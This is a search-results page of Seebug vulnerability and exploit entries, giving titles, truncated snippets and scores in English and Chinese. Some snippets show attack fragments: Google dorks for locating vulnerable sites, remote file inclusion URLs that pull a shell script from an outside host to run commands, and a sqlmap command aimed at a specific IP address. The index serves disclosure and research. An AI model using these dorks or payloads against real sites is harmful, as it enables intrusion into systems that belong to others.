Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2014/07/01 12:0 a.m.66 views

ES CmS 0.1 - SQL Injection Vulnerability

No description provided by source. ? Exploit Title: ES CmS 0.1 Sql Injection Vulnerability Google Dork: inurl:/page.php?id= Date: 2012 Exploit Author: MR.XpR Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escmsalphav01.zip Version: v.0.1 Tested on: ...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.66 views

Kaillera Multiple Clients Buffer Overflow Vulnerabilities

No description provided by source. !/usr/bin/perl Exploit Title: Remote Buffer Overflows in Kaillera clients Date: 6/30/11 Author: sil3ntdre4m Software Link: Multiple: 1. Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.66 views

Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7411/info A problem has been reported in Microsoft Windows. Due to improper bounds checking by the regedit.exe program, it may be possible for a local attacker to execute arbitrary code as another user. / 09/04/2003...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.66 views

phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities

No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.66 views

QNX QCONN 6.5.0 >=, >= 1.4.207944 - Remote Command Execution Vulnerability

No description provided by source. Title : QNX QCONN Remote Command Execution Vurnerability Version : QNX 6.5.0 = , QCONN = 1.4.207944 Download: http://www.qnx.com/download/feature.html?programid=23665 QNX Neutrino 6.5.0 SP1 Vendor : http://www.qnx.com Date : 2012/09/09 CVE : N/A Exploit Author :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/06/27 12:0 a.m.66 views

用友某通用系统存在SQL注入

简要描述: 用友某通用系统存在SQL注入 详细说明: 用友TurboCRM存在通用sql注入。 存在注入的文件路径: code\www\background\festivalremind.php festivalremind.php文件中ID参数未做过滤 漏洞URL: http://220.178.27.116:8001//background/festivalremind.php?ID=99999 festivalremind.php文件中ID参数未做过滤存在mssql timebased盲注。 sqlmap.py -u...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/06/10 12:0 a.m.66 views

Anymacro Mail System 6 /share.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/04/16 12:0 a.m.66 views

PHPMyWind最新版SQL注入漏洞

简要描述: PHPMyWind最新版SQL注入 详细说明: 文件:/data/alipay/returnurl.php $alipayNotify = new AlipayNotify$alipayconfig; $verifyresult = $alipayNotify-verifyReturn; if$verifyresult //验证成功...

7AI score
Exploits0
seebug.org
seebug.org
added 2014/03/27 12:0 a.m.66 views

phpmywind 4.6.6 /order.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/02/12 12:0 a.m.66 views

Microsoft Internet Explorer内存破坏漏洞(MS14-010)

CVECAN ID:...

9.3CVSS6.4AI score0.28484EPSS
Exploits2
seebug.org
seebug.org
added 2013/11/07 12:0 a.m.66 views

PHPSHE B2C商城系统通杀SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2013/04/28 12:0 a.m.66 views

phpMyAdmin 'filename_template' 远程代码执行(CVE-2013-3239)

BUGTRAQ ID: 59465 CVECAN ID: CVE-2013-3239 phpmyadmin是MySQL数据库的在线管理工具,主要功能包括在线创建数据表、运行SQL语句、搜索查询数据以及导入导出数据等。 phpMyAdmin 3.5.x、4.x在配置了SaveDir目录后,通过导出文件文件名的双扩展名,经过身份验证的远程用户可以执行任意代码,导致Apache HTTP服务器将此文件解释为可执行文件。例如:.php.sql文件名。 0 phpMyAdmin 3.x phpMyAdmin 3.5.x 厂商补丁: phpMyAdmin ----------...

4.6CVSS6.2AI score0.08753EPSS
Exploits7
seebug.org
seebug.org
added 2013/04/11 12:0 a.m.66 views

Microsoft Windows Kernel本地权限提升漏洞(CVE-2013-1294)(MS13-031)

BUGTRAQ ID: 58862 CVECAN ID: CVE-2013-1294 Microsoft Windows是微软公司推出的一系列操作系统。 如果 Windows 内核不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以获得更高的特权和读取任意多次内核内存。 0 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2008 Microsoft Windows Server 2003 Microsoft Windows 8 Microsoft Windows 7...

4.9CVSS6.4AI score0.01064EPSS
Exploits1
seebug.org
seebug.org
added 2013/02/28 12:0 a.m.66 views

VMware vCenter, ESXi, ESX NFC协议内存破坏漏洞

BUGTRAQ ID: 58115 CVECAN ID: CVE-2013-1659 VMware vCenter是VMware vSphere套件中一个强大的主机和虚拟机集中管理组件。VMware ESX Server是为适用于任何系统环境的企业级虚拟计算机软件。 VMware vCenter, ESXi, ESX NFC在处理NFC协议时存在安全漏洞,要利用此漏洞攻击者必须截获并修改vCenter Server与客户端或ESXi/ESX与客户端之间的NFC通讯。成功利用此漏洞可导致代码执行。 0 VMWare ESX 4.1 VMWare ESX 4.0 VMWare ESX 3.5...

7.6CVSS6.6AI score0.01816EPSS
Exploits1
seebug.org
seebug.org
added 2011/12/26 12:0 a.m.66 views

phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]

No description provided by source. !/usr/bin/php ?php printr' +---------------------------------------------------------------------------+ pma3 - phpMyAdmin3 remote code execute exploit Not jileichicken's ribs by oldjunwww.oldjun.com welcome to www.t00ls.net mail: [email protected] Assigned CVE...

6.4CVSS0.1AI score0.12879EPSS
Exploits15
seebug.org
seebug.org
added 2011/06/25 12:0 a.m.66 views

Mozilla Firefox/Thunderbird/SeaMonkey Array.reduceRight()远程代码执行漏洞

BUGTRAQ ID: 48372 CVECAN ID: CVE-2011-2371 Firefox是一款非常流行的开源WEB浏览器。Thunderbird是一个邮件客户端,支持IMAP、POP邮件协议以及HTML邮件格式。SeaMonkey是开源的Web浏览器、邮件和新闻组客户端、IRC会话客户端和HTML编辑器。 Mozilla Firefox、Thunderbird和SeaMonkey在处理超长JavaScript数组的实现上存在远程代码执行漏洞,远程攻击者可利用这些漏洞执行任意代码,使受响应用程序崩溃,可能造成拒绝服务。 Mozilla Firefox 3.6.x Mozilla...

10CVSS3.1AI score0.75691EPSS
Exploits17
seebug.org
seebug.org
added 2010/04/26 12:0 a.m.66 views

Apache Tomcat认证头信息泄露漏洞

BUGTRAQ ID: 39635 CVE ID: CVE-2010-1157 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 BASIC和DIGEST认证的WWW-Authenticate头包含有区域名。如果web.xml中对应用指定了realm- name元素,就会使用指定的区域名,否则Tomcat就会使用以下代码段生成一个区域名: request.getServerName + ":" + request.getServerPort 在某些环境中这可能会暴露运行Tomcat机器的本地主机名或IP地址。 Apache Group Tomcat 6.0.x...

2.6CVSS5.1AI score0.52507EPSS
Exploits6
seebug.org
seebug.org
added 2010/03/24 12:0 a.m.66 views

Linux kernel 2.6.x KVM超大SMP指令本地拒绝服务漏洞

BUGTRAQ ID: 37130 CVE ID: CVE-2009-4031 Linux Kernel是开放源码操作系统Linux所使用的内核。 在x86平台上,x86模拟器上的arch/x86/kvm/emulate.c文件的doinsnfetch函数没有限制每次指令可获取的指令字节数。guest操作系统中的用户可以利用这个漏洞在SMP主机上造成很大的延迟,导致主机操作系统上本地拒绝服务。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.8CVSS0.03112EPSS
Exploits1
seebug.org
seebug.org
added 2009/12/14 12:0 a.m.66 views

Redmine &lt;= 0.8.6 CSRF Add Admin User Exploit

No description provided by source. / Redmine = 0.8.6 CSRF Add Admin User Exploit Discovered by: p0deje http://p0deje.blogspot.com Application: http://www.redmine.org/wiki/redmine/Download SA: http://www.redmine.org/news/30 Date: 13.11.2009 Versions affected: = 0.8.6 Vulnerability: Cross-site...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/11/19 12:0 a.m.66 views

CUPS文件描述符处理远程拒绝服务漏洞

BUGTRAQ ID: 37048 CVE ID: CVE-2009-3553 Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。 CUPS的scheduler/select.c文件中的cupsdDoSelect函数在处理其文件描述符处理接口中引用的方式存在释放后使用错误,远程攻击者可以通过以特殊方式查询特定打印机的当前打印任务列表导致cupsd崩溃。 Easy Software Products CUPS 1.3.7...

5CVSS1.9AI score0.03913EPSS
Exploits1
seebug.org
seebug.org
added 2009/11/05 12:0 a.m.66 views

Linux内核'pipe.c'本地特权提升漏洞

Bugraq ID: 36901 CVE ID:CVE-2009-3547 Linux是一款开放源代码的操作系统。 Linux Kernel 'pipe.c'存在一个Null指针引用问题,本地攻击者可以利用漏洞提升特权。 piperdwropen会触发Null指针异常生成如下堆栈跟踪: Unable to handle kernel NULL pointer dereference at 0000000000000028 RIP: ffffffff802899a5 piperdwropen+0x35/0x70 ffffffff8028125c dentryopen+0x13c/0x230...

6.9CVSS7.2AI score0.0493EPSS
Exploits7
seebug.org
seebug.org
added 2009/10/27 12:0 a.m.66 views

Adobe Reader: Multiple vulnerabilities

No description provided by source. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200910-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - ...

9.3CVSS9AI score0.86468EPSS
Exploits33
seebug.org
seebug.org
added 2009/07/10 12:0 a.m.66 views

WordPress口令重置用户名枚举漏洞

BUGTRAQ ID: 35581 CVECAN ID: CVE-2009-2335,CVE-2009-2336 WordPress是一款免费的论坛Blog系统。 WordPress对于使用已有的用户名和不存在用户名的登录尝试会返回不同的结果,这降低了暴力猜测攻击的复杂性;此外在使用口令重置界面请求新口令的时候,对于已有的和不存在的用户名也会返回不同的结果。 WordPress WordPress 2.6.5 WordPress WordPress MU 2.7.1 WordPress ---------...

5CVSS6.2AI score0.85EPSS
Exploits15
seebug.org
seebug.org
added 2009/05/17 12:0 a.m.66 views

Sendmail X-header头远程堆溢出漏洞

BUGTRAQ ID: 34944 CVECAN ID: CVE-2009-1490 Sendmail是很多大型站点都在使用的邮件传输代理(MTA)。 如果远程攻击者向Sendmail发送了包含有超长X-header头的畸形报文的话,就可能触发堆溢出,导致拒绝服务或执行任意代码。 Sendmail 8.13.2 Sendmail Consortium ------------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.sendmail.org/releases/8.13.2 $ telnet example.com 25...

5CVSS6.4AI score0.12614EPSS
Exploits1
seebug.org
seebug.org
added 2009/04/28 12:0 a.m.66 views

TotalCalendar cms_detect.php模块本地文件包含漏洞

BUGTRAQ ID: 34634 CVECAN ID: CVE-2009-1406 TotalCalendar是一种基于Web的日程管理系统。 TotalCalendar的cmsdetect.php模块没有正确地验证对include参数所传送的输入便用于包含文件,远程攻击者可以通过目录遍历攻击包含本地资源的任意文件。以下是cmsdetect.php中的有漏洞代码段: ------------------------------------------------------------------------------- Line 26 : $include =...

6.8CVSS6.5AI score0.01896EPSS
Exploits2
seebug.org
seebug.org
added 2009/02/27 12:0 a.m.66 views

Linux Kernel readlink本地权限提升漏洞

BUGTRAQ ID: 33412 CVECAN ID: CVE-2009-0269 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的eCryptfs子系统的fs/ecryptfs/inode.c文件没有正确地检查readlink调用的返回结果。如果readlink调用生成的错误导致将-1返回值用作了数组索引,本地用户就可以导致拒绝服务或获得权限提升。 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

4.9CVSS0.4AI score0.00502EPSS
Exploits1
seebug.org
seebug.org
added 2008/11/21 12:0 a.m.66 views

Streamripper lib/http.c文件多个缓冲区溢出漏洞

BUGTRAQ ID: 32356 CVECAN ID: CVE-2008-4829 StreamRipper能够将网上的MP3流媒体保存到硬盘中,特别适合录制网络MP3广播。 Streamripper的lib/http.c文件中的httpparsescheader函数在解析以Zwitterion v开始的超长HTTP头时、httpgetpls函数在解析包含有超长项的特制pls播放列表时、httpgetm3u函数在解析包含有超长File项的特制m3u播放列表时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意的服务器并加载了恶意的媒体文件的话,就可以触发这些溢出,导致执行任意指令。...

9.3CVSS0.8AI score0.06477EPSS
Exploits1
seebug.org
seebug.org
added 2008/10/16 12:0 a.m.66 views

Microsoft Excel公式解析整数溢出漏洞(MS08-057)

BUGTRAQ ID: 31706 CVECAN ID: CVE-2008-4019 Excel是微软Office办公套件中的电子表格工具。 Excel的REPT函数在处理单元格中的公式时存在整数溢出漏洞。如果用户受骗打开了特意的.xsl文档的话,就可以触发这个溢出,导致执行任意指令。 Microsoft Excel Viewer 2003 SP3 Microsoft Excel Viewer 2003 Microsoft Excel Viewer Microsoft Excel 2007 SP1 Microsoft Excel 2007 Microsoft Excel 2003 SP3...

9.3CVSS6.8AI score0.34415EPSS
Exploits5
seebug.org
seebug.org
added 2008/04/17 12:0 a.m.66 views

Lighttpd SSL错误拒绝服务漏洞

BUGTRAQ ID: 28489 CVECAN ID: CVE-2008-1531 Lighttpd是一款轻型的开放源码Web Server软件包。 lighttpd没有正确地清除OpenSSL错误队列,如果远程攻击者可以触发SSL错误的话,如在下载结束前断开连接,lighttpd就可能断开所有活动的SSL连接。 LightTPD 1.4.19 厂商补丁: Debian ------ Debian已经为此发布了一个安全公告(DSA-1540-2)以及相应补丁: DSA-1540-2:New lighttpd packages fix denial of service...

4.3CVSS0.2AI score0.03366EPSS
Exploits1
seebug.org
seebug.org
added 2008/02/10 12:0 a.m.66 views

PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities

No description provided by source. ------------------------------------------------------------- ----- H-T Team HouSSaMix + ToXiC350 from MoroCCo -------- ------------------------------------------------------------- = Author : HouSSaMix From H-T Team = Script : PKs Movie Database version 3.0.3 =...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/28 12:0 a.m.66 views

Gallery 2.2.4之前版本多个远程安全漏洞

BUGTRAQ ID: 27035 Gallery是基于Web的开源相册管理器。 Gallery的2.2.4之前版本存在多个安全漏洞,允许恶意用户泄露敏感信息、执行跨站脚本攻击、绕过安全限制或入侵有漏洞的系统。 1 Publish XP模块中的漏洞可能导致未经正确的授权便创建和上传文件。 2 URL重写模块中的管理员控制器中的漏洞可能允许包含本地文件。 3 core和add-item模块中没有正确地过滤通过文件名所传送的输入,导致在用户浏览器会话中执行任意HTML和脚本代码。 4 Core/MIME模块中没有对上传文件的扩展名执行正确的检查。 5 Gallery...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2007/12/26 12:0 a.m.66 views

PHP error_log()安全模式限制绕过漏洞

BUGTRAQ ID: 18645 CVECAN ID: CVE-2006-3011 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。 PHP的errorlog函数中存在安全模式限制绕过漏洞: PHP5: - -2013-2050--- PHPAPI int phperrorlogint opterr, char message, char opt, char headers TSRMLSDC phpstream stream = NULL; switch opterr case 1: /send an email / if HAVESENDMAIL if...

4.6CVSS0.01342EPSS
Exploits2
seebug.org
seebug.org
added 2007/12/24 12:0 a.m.66 views

PHP Real Estate Classifieds &quot;id&quot; SQL Injection

t0pP8uZz & xprog have reported a vulnerability in PHP Real Estate Classifieds, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "id" parameter in fullnews.php is not properly sanitised before being used in SQL queries. This can be exploited to...

8.1AI score
Exploits0
seebug.org
seebug.org
added 2007/12/13 12:0 a.m.66 views

MySQL服务器RENAME TABLE系统表格覆盖漏洞

BUGTRAQ ID: 26765 CVECAN ID: CVE-2007-5969 MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。 MySQL在某些配置情况下存在漏洞,本地攻击者可能利用此漏洞修改破坏数据表。 如果表格设置了DATA DIRECTORY和INDEX DIRECTORY选项的话,MySQL服务器在使用RENAME TABLE语句重新命名该表格时存在错误,可能允许攻击者通过某些符号链接替换所指向的文件导致覆盖系统表格信息。 MySQL AB MySQL...

7.1CVSS0.2AI score0.1426EPSS
Exploits2
seebug.org
seebug.org
added 2007/11/17 12:0 a.m.66 views

Samba nmbd_packets.c NetBIOS回复栈溢出漏洞

BUGTRAQ ID: 26455 CVECAN ID: CVE-2007-5398 Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 Samba的nmbd/nmbdpackets.c文件中的replynetbiospacket函数在发送NetBIOS回复时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制服务器。 如果客户端发送了多个特制的WINS “Name Registration”请求并跟随有WINS “Name...

9.3CVSS0.4AI score0.1125EPSS
Exploits1
seebug.org
seebug.org
added 2007/09/05 12:0 a.m.66 views

Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit

No description provided by source. !/usr/bin/perl ' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ ' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ '++ Author: Koshi + '++ Email: heykoshi at gmail dot com +...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/26 12:0 a.m.66 views

Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability

No description provided by source. Webavis Remote file inclusion root Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz Thanks Str0ke :D Exploit : http://victim.com/webavis/class/class.php?root=shell.txt ? Discovered by ThE TiGeR MiroTigeratHotmail.com sebug.net...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/21 12:0 a.m.66 views

SunLight CMS Root参数多个远程文件包含漏洞

SunLight CMS是一款基于PHP的WEB应用程序。 SunLight CMS不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'root'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 SunLight CMS 5.3 目前没有解决方案提供: http://sunlight.profitux.cz/ http://www.example.com/path/modules/startup.php?root=Sh3LL Script...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/18 12:0 a.m.66 views

Beacon Splash.lang.PHP远程文件包含漏洞

Beacon是一款基于PHP的WEB应用程序。 Beacon不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Splash.lang.PHP'脚本对用户提交的'languagePath'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 GNU Beacon 0.2 目前没有解决方案提供: http://savannah.gnu.org/projects/beaconoptions...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/18 12:0 a.m.66 views

MySQL Alter表函数信息泄露漏洞

MySQL是一款开放源代码的数据库程序。 MySQL不正确执行针对Alter表函数的访问控制,远程攻击者可以利用漏洞获得敏感信息。 目前没有详细漏洞细节提供。 MySQL AB MySQL 5.1.17 MySQL AB MySQL 5.1.16 MySQL AB MySQL 5.1.15 MySQL AB MySQL 5.1.14 MySQL AB MySQL 5.1.13 MySQL AB MySQL 5.1.12 MySQL AB MySQL 5.1.11 MySQL AB MySQL 5.1.10 MySQL AB MySQL 5.1.9 MySQL AB MySQL 5.1.6...

7AI score
Exploits0
seebug.org
seebug.org
added 2007/05/12 12:0 a.m.66 views

Monalbum 0.8.7 Remote Code Execution Exploit

No description provided by source. ?php / \|/// \ - - // @ @ ----oOOo---oOOo--------------------------------------------------- Y! Underground Group [email protected] Dj7xpl.2600.ir ----ooooO-----Ooooo-------------------------------------------------- \ / \ /...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/03/02 12:0 a.m.66 views

Mani Stats Reader &lt;= 1.2 (ipath) Remote File Include Vulnerability

No description provided by source. Mani Admin Plugin Stats Reader V1.2 rfi : dork:"2006 by www.mani-stats-reader.de.vu" "allinurl:.php?ipath= inurl:"css"" vuln:index.php?ipath=evilshit greetz:RST, LinuxPakistan phpfreaks [email protected] milw0rm.com 2007-03-02...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/15 12:0 a.m.66 views

PhpLeague &quot;cheminmini&quot;远程文件包含漏洞

PhpLeague是一款基于PHP的WEB应用程序。 PhpLeague不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'consult/miniseul.php'和'config.php'脚本对用户提交的'cheminmini'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 PhpLeague 0.x 升级到0.82版本: http://phpleague.univert.org/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/12 12:0 a.m.66 views

SSH Tectia Windows特定路径特权提升漏洞

SSH Tectia基于SSH技术,集中管理情况下提供 安全的系统管理,安全的文件传输,安全的程序之间的连接。 Windows版本下的SSH Tectia产品在子进程执行中处理路径名存在漏洞,本地攻击者可以利用漏洞提升特权。 如果本地用户允许建立系统盘ROOT目录中或者"Program Files"文件夹或其子目录中建立文件,就可能放置恶意程序代替正确的SSH Tectia子组件,结果导致以高权限执行任意程序。 SSH Communications Security Tectia Server 5.0.1 SSH Communications Security Tectia Server...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/11/29 12:0 a.m.66 views

ProFTPD mod_tls预认证远程缓冲区溢出漏洞

ProFTPD是一款开放源代码FTP服务程序。 ProFTPD的模块modtls在处理用户认证时存在缓冲溢出漏洞,远程攻击者可能利用此漏洞完全控制服务器。 ProFTPD的modtls模块的tlsx509nameoneline函数中存在远程溢出漏洞,允许远程未经认证的攻击者获得root用户权限。漏洞相关的代码如下: contrib/modtls.c: """ static char tlsx509nameonelineX509NAME x509name static char buf256 = '\0'; / If we are using OpenSSL 0.9.6 or newer,...

7AI score
Exploits0
seebug.org
seebug.org
added 2006/11/02 12:0 a.m.66 views

Cisco Secure Desktop SSL VPN会话多个信息泄露漏洞

Cisco Secure Desktop CSD可以通过加密降低远程用户注销或SSL VPN会话超时后cookies、浏览器历史记录、临时文件和下载内容在系统上所遗留的风险。 CSD的实现上存在如下一些问题,可能导致在SSL VPN会话相关的敏感信息泄露。 1. Windows页面文件信息泄露 由于Windows虚拟内存子系统运行的方式,任何应用程序所使用的虚拟物理内存,包括在Secure...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/08/20 12:0 a.m.66 views

WebspotBlogging login.php远程SQL注入漏洞

BUGTRAQ ID: 16319 CVECAN ID: CVE-2006-0324 WebspotBlogging是一款PHP编写的Blog程序。 WebspotBlogging对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库绕过认证。 WebspotBlogging的login.php脚本对用户提交username参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。 WebspotBlogging WebspotBlogging 3.0 WebspotBlogging ---------------...

7.5CVSS6.5AI score0.02513EPSS
Exploits2
seebug.org
seebug.org
added 2006/07/17 12:0 a.m.66 views

SMF Forum Mambo Component &lt;= 1.3.1.3 Include Vulnerability

No description provided by source. Joomla-SMF Forum Bridge For Mambo 4.5.3+ And Mambo 4.5.3+ Remote File Inclusion Vulnebrality Discovered by : ASIANEAGLE Remote:Yes Level:High --------------------------------------------------------- Application: SMF Forum 1.3.1.3 Bridge Component For Joomla And...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/05/14 12:0 a.m.65 views

Cisco RV34x系列 授权远程代码执行漏洞(CVE-2021-1413 CVE-2021-1414 CVE-2021-1415)

...

6.5CVSS0.7AI score0.01863EPSS
Exploits2
seebug.org
seebug.org
added 2018/06/08 12:0 a.m.65 views

WebKit: Use-after-free when resuming generator(CVE-2018-4218)

In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling: var state = this.@generatorState; and set by calling: generator.@generatorState =...

0.1AI score0.09077EPSS
Exploits3
Total number of security vulnerabilities5000